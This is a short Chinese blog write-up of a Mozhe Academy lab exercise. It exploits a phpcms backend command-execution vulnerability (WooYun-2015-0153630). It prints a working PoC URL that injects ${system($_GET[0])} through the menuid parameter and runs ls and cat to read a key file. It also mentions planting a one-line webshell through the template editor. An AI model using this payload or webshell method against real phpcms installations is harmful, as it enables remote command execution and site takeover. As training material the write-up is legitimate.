墨者学院-CMS系统漏洞分析溯源(第2题)

靶场地址:
https://www.mozhe.cn/bug/detail/ajFqNFRadkk2alNtOVRUVm9MSXA2Zz09bW96aGUmozhe

用到的漏洞介绍:

漏洞编号:WooYun-2015-0153630

漏洞名称:phpcms后台低权限任意命令执行

Poc:

index.php?0=[命令]&m=content&c=content&a=public_categorys&type=add&menuid=822;${system($_GET[0])}&pc_hash=vad6K3&from=block

首先找到后台地址,养成好习惯先查看robots.txt是否有有用的信息


发现了后台地址,并且账号密码自动填充,可以直接登录
这里获得key有两种方法,一种是在界面-模板风格修改代码注入一句话木马,然后使用菜刀连接。

一种是使用上述漏洞执行代码
执行ls命令,发现key所在


执行cat key_16041211526820.php,查看网页源代码


©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容